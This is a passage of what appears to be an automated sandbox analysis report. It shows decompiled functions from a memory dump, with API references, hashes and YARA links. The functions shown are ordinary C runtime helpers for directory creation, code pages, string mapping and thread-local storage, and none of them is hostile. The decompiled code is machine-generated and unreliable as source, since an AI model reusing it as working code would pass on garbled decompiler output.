                                                                                                                                                    • Opcode ID: 8016c5f7e1e2713408d69d90ca2a1257aa35e3a497b700dabd2875940d41ae31
                                                                                                                                                    • Instruction ID: e8dc185aff640988c13db013d2ab4c2d143046b44f76146198d6839cdeb25b6e
                                                                                                                                                    • Opcode Fuzzy Hash: 8016c5f7e1e2713408d69d90ca2a1257aa35e3a497b700dabd2875940d41ae31
                                                                                                                                                    • Instruction Fuzzy Hash: 2A3148716183029FDF24CF28E91876ABBD9EBA0718F04451DFA459B1C9C771D888CBB2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A147, Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0121A147(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E0122E1C0();
				_t21 = _a4;
				_t8 =  *(E0121BBA9(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E0121A0C0(_t21) != 0 || E0121B5AC(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E0121A384(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









                                                                                                                                                    0x0121a14f
                                                                                                                                                    0x0121a155
                                                                                                                                                    0x0121a15e
                                                                                                                                                    0x0121a164
                                                                                                                                                    0x0121a178
                                                                                                                                                    0x0121a180
                                                                                                                                                    0x0121a1be
                                                                                                                                                    0x0121a1c4
                                                                                                                                                    0x0121a1c7
                                                                                                                                                    0x0121a1d3
                                                                                                                                                    0x0121a1d5
                                                                                                                                                    0x0121a1c9
                                                                                                                                                    0x0121a1c9
                                                                                                                                                    0x0121a1cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a1ce
                                                                                                                                                    0x0121a1d0
                                                                                                                                                    0x0121a1d0
                                                                                                                                                    0x0121a1cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a16b
                                                                                                                                                    0x0121a16e
                                                                                                                                                    0x0121a176
                                                                                                                                                    0x0121a1ab
                                                                                                                                                    0x0121a1af
                                                                                                                                                    0x0121a1b5
                                                                                                                                                    0x0121a1b5
                                                                                                                                                    0x0121a1ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a176
                                                                                                                                                    0x0121a1da

                                                                                                                                                    APIs
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0121A053,?,00000001,00000000,?,?), ref: 0121A16E
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0121A053,?,00000001,00000000,?,?), ref: 0121A1A1
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0121A053,?,00000001,00000000,?,?), ref: 0121A1BE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2485089472-0
                                                                                                                                                    • Opcode ID: b71353878c51d5500742a67fa284b816638aec162dad2a7ee65fbca7d7fbb8fd
                                                                                                                                                    • Instruction ID: 340b100149d55761cdb2debaa3b451f528e5a88d31964574d5e3d31311692f8f
                                                                                                                                                    • Opcode Fuzzy Hash: b71353878c51d5500742a67fa284b816638aec162dad2a7ee65fbca7d7fbb8fd
                                                                                                                                                    • Instruction Fuzzy Hash: 1C019231172196A6EB32DA7D6C09BFA37E9AF362C1F044851FF01D708CD7658581D6A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123AE73, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E0123AE73(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0x123b4c6
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0x123b4c6
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E0123BF68(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0xdb855708
					E0123A0F5(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0xdb855708
					E0123A0F5(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E0122EA8A(_v8 ^ _t102);
			}































                                                                                                                                                    0x0123ae73
                                                                                                                                                    0x0123ae7e
                                                                                                                                                    0x0123ae85
                                                                                                                                                    0x0123ae8a
                                                                                                                                                    0x0123ae95
                                                                                                                                                    0x0123aea7
                                                                                                                                                    0x0123af9f
                                                                                                                                                    0x0123af9f
                                                                                                                                                    0x0123afa5
                                                                                                                                                    0x0123afa7
                                                                                                                                                    0x0123afa8
                                                                                                                                                    0x0123afa8
                                                                                                                                                    0x0123afaa
                                                                                                                                                    0x0123afb0
                                                                                                                                                    0x0123afb0
                                                                                                                                                    0x0123afb2
                                                                                                                                                    0x0123afb4
                                                                                                                                                    0x0123afbd
                                                                                                                                                    0x0123afc0
                                                                                                                                                    0x0123afcc
                                                                                                                                                    0x0123afd3
                                                                                                                                                    0x0123afe3
                                                                                                                                                    0x0123afd5
                                                                                                                                                    0x0123afd5
                                                                                                                                                    0x0123afd8
                                                                                                                                                    0x0123afd8
                                                                                                                                                    0x0123afd8
                                                                                                                                                    0x0123afdc
                                                                                                                                                    0x0123afdc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123afdc
                                                                                                                                                    0x0123afc2
                                                                                                                                                    0x0123afc2
                                                                                                                                                    0x0123afc7
                                                                                                                                                    0x0123afc7
                                                                                                                                                    0x0123afdf
                                                                                                                                                    0x0123afdf
                                                                                                                                                    0x0123afdf
                                                                                                                                                    0x0123afe5
                                                                                                                                                    0x0123afeb
                                                                                                                                                    0x0123afeb
                                                                                                                                                    0x0123aff1
                                                                                                                                                    0x0123aff2
                                                                                                                                                    0x0123aff2
                                                                                                                                                    0x0123aead
                                                                                                                                                    0x0123aead
                                                                                                                                                    0x0123aeaf
                                                                                                                                                    0x0123aeaf
                                                                                                                                                    0x0123aeb6
                                                                                                                                                    0x0123aeb7
                                                                                                                                                    0x0123aebb
                                                                                                                                                    0x0123aec1
                                                                                                                                                    0x0123aec7
                                                                                                                                                    0x0123aeef
                                                                                                                                                    0x0123aeef
                                                                                                                                                    0x0123aef1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aed0
                                                                                                                                                    0x0123aed4
                                                                                                                                                    0x0123aee6
                                                                                                                                                    0x0123aee6
                                                                                                                                                    0x0123aee8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aed9
                                                                                                                                                    0x0123aedb
                                                                                                                                                    0x0123aedd
                                                                                                                                                    0x0123aee5
                                                                                                                                                    0x0123aee5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aee5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123aedb
                                                                                                                                                    0x0123aeea
                                                                                                                                                    0x0123aeea
                                                                                                                                                    0x0123aeed
                                                                                                                                                    0x0123aeed
                                                                                                                                                    0x0123aef4
                                                                                                                                                    0x0123af09
                                                                                                                                                    0x0123af0f
                                                                                                                                                    0x0123af23
                                                                                                                                                    0x0123af2a
                                                                                                                                                    0x0123af39
                                                                                                                                                    0x0123af4b
                                                                                                                                                    0x0123af52
                                                                                                                                                    0x0123af5a
                                                                                                                                                    0x0123af5c
                                                                                                                                                    0x0123af5c
                                                                                                                                                    0x0123af66
                                                                                                                                                    0x0123af76
                                                                                                                                                    0x0123af78
                                                                                                                                                    0x0123af8f
                                                                                                                                                    0x0123af7a
                                                                                                                                                    0x0123af7a
                                                                                                                                                    0x0123af7a
                                                                                                                                                    0x0123af7a
                                                                                                                                                    0x0123af7f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123af7f
                                                                                                                                                    0x0123af68
                                                                                                                                                    0x0123af68
                                                                                                                                                    0x0123af6d
                                                                                                                                                    0x0123af86
                                                                                                                                                    0x0123af86
                                                                                                                                                    0x0123af86
                                                                                                                                                    0x0123af96
                                                                                                                                                    0x0123af97
                                                                                                                                                    0x0123af9b
                                                                                                                                                    0x0123b006

                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0123AE98
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                    • Opcode ID: 620edf6eea5a391b4d03fc34e8bc0209939bca7007d8d4b578a2d941a8be9999
                                                                                                                                                    • Instruction ID: e04acc4de09c7be81085c933d09f487beb542f2b7a13a69205540a057d647bd4
                                                                                                                                                    • Opcode Fuzzy Hash: 620edf6eea5a391b4d03fc34e8bc0209939bca7007d8d4b578a2d941a8be9999
                                                                                                                                                    • Instruction Fuzzy Hash: 80411AF05143489FDB228E688C84AF6BBBDDB95704F1444FDE6CAC7182D2369A45CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123A5AC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                                    			E0123A5AC(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E0123A2D8(0x16, "LCMapStringEx", 0x1246354, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E0123A634(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x1242260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E0122EA8A(_v8 ^ _t33);
			}








                                                                                                                                                    0x0123a5ac
                                                                                                                                                    0x0123a5b1
                                                                                                                                                    0x0123a5b2
                                                                                                                                                    0x0123a5b9
                                                                                                                                                    0x0123a5bc
                                                                                                                                                    0x0123a5ce
                                                                                                                                                    0x0123a5d3
                                                                                                                                                    0x0123a5da
                                                                                                                                                    0x0123a61d
                                                                                                                                                    0x0123a5dc
                                                                                                                                                    0x0123a5f9
                                                                                                                                                    0x0123a5ff
                                                                                                                                                    0x0123a5ff
                                                                                                                                                    0x0123a631

                                                                                                                                                    APIs
                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,7FE85006,00000001,?,000000FF), ref: 0123A61D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String
                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                    • Opcode ID: 600105c494462a6fe796ce7f99bf046681b777dfe9b1db1239f2e33d2ff6840d
                                                                                                                                                    • Instruction ID: 1df53c444de556718978e02f5b23c088dfd560b4963930737f32a945111f97e2
                                                                                                                                                    • Opcode Fuzzy Hash: 600105c494462a6fe796ce7f99bf046681b777dfe9b1db1239f2e33d2ff6840d
                                                                                                                                                    • Instruction Fuzzy Hash: 4601257251021DBBCF169F91EC05DEE3F62FF98B10F044118FE1866120C6328931EB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123A54A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                    			E0123A54A(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t8 ^ _t22;
				_t10 = E0123A2D8(0x14, "InitializeCriticalSectionEx", 0x124634c, 0x1246354); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x1242260(_a4, _a8, _a12);
					 *_t20();
				}
				return E0122EA8A(_v8 ^ _t22);
			}








                                                                                                                                                    0x0123a54f
                                                                                                                                                    0x0123a550
                                                                                                                                                    0x0123a557
                                                                                                                                                    0x0123a56c
                                                                                                                                                    0x0123a571
                                                                                                                                                    0x0123a578
                                                                                                                                                    0x0123a595
                                                                                                                                                    0x0123a57a
                                                                                                                                                    0x0123a585
                                                                                                                                                    0x0123a58b
                                                                                                                                                    0x0123a58b
                                                                                                                                                    0x0123a5a9

                                                                                                                                                    APIs
                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,01239BAF), ref: 0123A595
                                                                                                                                                    Strings
                                                                                                                                                    • InitializeCriticalSectionEx, xrefs: 0123A565
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                                                    • Opcode ID: b219cc64e71a357d798e984aab16f8fcd2ad25ac1680e157f43286a2fc1f704c
                                                                                                                                                    • Instruction ID: 2f4cad2bd20f2e2a407b0373489f2735eb2285ae26158ac64d6b62ef93ead0f6
                                                                                                                                                    • Opcode Fuzzy Hash: b219cc64e71a357d798e984aab16f8fcd2ad25ac1680e157f43286a2fc1f704c
                                                                                                                                                    • Instruction Fuzzy Hash: EEF0BE75A6122CFBCB15AF52EC05CAE7F61EB48B20B014129FD099B250CA724A10AB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123A3EF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                    			E0123A3EF(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t4 ^ _t18;
				_t6 = E0123A2D8(3, "FlsAlloc", 0x1246310, 0x1246318); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x1242260(_a4);
					 *_t16();
				}
				return E0122EA8A(_v8 ^ _t18);
			}








                                                                                                                                                    0x0123a3f4
                                                                                                                                                    0x0123a3f5
                                                                                                                                                    0x0123a3fc
                                                                                                                                                    0x0123a411
                                                                                                                                                    0x0123a416
                                                                                                                                                    0x0123a41d
                                                                                                                                                    0x0123a42e
                                                                                                                                                    0x0123a41f
                                                                                                                                                    0x0123a424
                                                                                                                                                    0x0123a42a
                                                                                                                                                    0x0123a42a
                                                                                                                                                    0x0123a442

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Alloc
                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                                                    • Opcode ID: 00b25efe9e70c5976134ebefdda9e13daf1ec71d552860a16f9738af8463bcf5
                                                                                                                                                    • Instruction ID: cf1da03b86b97678394191470f7e75fc3961b4c83d4dc004778b08d63fe41fab
                                                                                                                                                    • Opcode Fuzzy Hash: 00b25efe9e70c5976134ebefdda9e13daf1ec71d552860a16f9738af8463bcf5
                                                                                                                                                    • Instruction Fuzzy Hash: 09E0557466122CAB8315ABA2BC0ADBEBF50DB99F10B400069FD0993201CE714E0087C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012330D7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E012330D7(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E01232FB6(4, "FlsAlloc", 0x1244664, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L0122EB4C();
				return  *_t6(_a4);
			}





                                                                                                                                                    0x012330ec
                                                                                                                                                    0x012330f1
                                                                                                                                                    0x012330f8
                                                                                                                                                    0x0123310b
                                                                                                                                                    0x0123310b
                                                                                                                                                    0x012330ff
                                                                                                                                                    0x01233108

                                                                                                                                                    APIs
                                                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 012330EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: try_get_function
                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                    • API String ID: 2742660187-671089009
                                                                                                                                                    • Opcode ID: 796db99f51a4b6e30e0f2094ae7bd07b0ba5e04e07330428ed3e5fa8c3960d0e
                                                                                                                                                    • Instruction ID: 629aff66ac532ecb6ba69a2d5ebc86054f2c118c27412c98f8343c1d4e6259d2
                                                                                                                                                    • Opcode Fuzzy Hash: 796db99f51a4b6e30e0f2094ae7bd07b0ba5e04e07330428ed3e5fa8c3960d0e
                                                                                                                                                    • Instruction Fuzzy Hash: 45D02E627A07BAFBC51432C62C02FAABE04DB80CB2F040061FF0C21201E8A2040042E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123B1D0, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E0123B1D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E0123AD9B(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x124d828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x124d828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x12706c4 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E0123AE0E(_t98);
												goto L37;
											}
										} else {
											E0122F1A0(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
